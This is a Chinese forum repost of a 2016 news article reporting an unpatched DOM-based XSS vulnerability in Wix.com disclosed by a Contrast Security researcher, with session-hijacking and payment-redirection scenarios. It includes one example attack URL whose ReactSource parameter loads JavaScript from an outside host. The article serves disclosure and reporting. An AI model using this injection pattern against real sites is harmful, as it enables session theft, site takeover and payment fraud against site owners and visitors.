首页
社区
课程
招聘
Wix.com存在未及时修复的漏洞将数百万网站置于危险之中
发表于: 2016-11-5 22:25 1819

Wix.com存在未及时修复的漏洞将数百万网站置于危险之中

2016-11-5 22:25
1819
新闻链接:http://bobao.360.cn/news/detail/3714.html
新闻时间:2016-11-04 10:10:35
新闻正文: 前言

Web主机云服务提供商Wix.com存在Dom型XSS漏洞,该漏洞可以让攻击者控制在该平台上托管的任何一个网站。

Contrast Security的高级安全研究员Matt Austin表示,“只需要在Wix上创建的网站上添加单个参数,攻击者可以让他们的恶意JavaScript代码在该网站上加载执行。”

Austin说,尽管早在十月份的时候就已经把漏洞信息向Wix通报,但是截止到本周三这个漏洞仍然没有被修复。Wix.com也没有对这个报告发表过任何回复。据Wix.com官方统计,在该平台共计8600万用户。

据OWASP报告显示,此漏洞不同于传统的XSS漏洞(payload存储于一个HTTP(S)请求的响应页面中),DOM型XSS漏洞通过客户端脚本修改用户浏览器中文档对象模型(DOM)环境,并且恶意代码会影响客户端代码的执行。

场景分析

Austin分析了2种反射DOM型XSS漏洞的攻击场景。其中一种是诱导Wix网站所有者点击一个恶意的URL链接。这个URL会加载一个精心构造的JavaScript代码劫持受害者浏览器的session信息。

随后攻击者可以侵占受害者的浏览器session,这样他就可以像原来的用户那样,执行任意的操作了。攻击者可以对受害者原先掌控着的Wix网站进行修改,例如向第三方提供网站管理员的权利,或渗透一个Wix电子商务站点来窃取信用卡号码。

Austin说,拥有Wix.com站点的管理员控制权限后,就能分发恶意软件,创建一个动态的、分布式的、基于浏览器的僵尸网络,窃取网络货币,并控制网站的内容和使用它的用户。

在Austin描述的第二个场景中,可以运用一个精心构造的URL,将用户诱导进入一个Wix网站。该URL通过一个DOM型的XSS攻击,将JavaScript加载到目标的Wix.com网站中。在某种情境中,通过浏览器的session信息,可以对一个Wix.com的粉丝网站进行修改,从而将音乐下载替换为恶意软件下载,或者将PayPal支付重新定向到第三方帐户。

在DOM XSS攻击的案例中,攻击者需要做的就是在服务器上布置恶意的JavaScript,并用一个URL指向它。例如:“http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com“。在这个例子中,根域名”http://matt4592.wixsite.com/music”后面嵌入了附加的“?ReactSource=http://m-austin.com”, 这为基于DOM的XSS攻击提供有效载荷创造了条件。

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//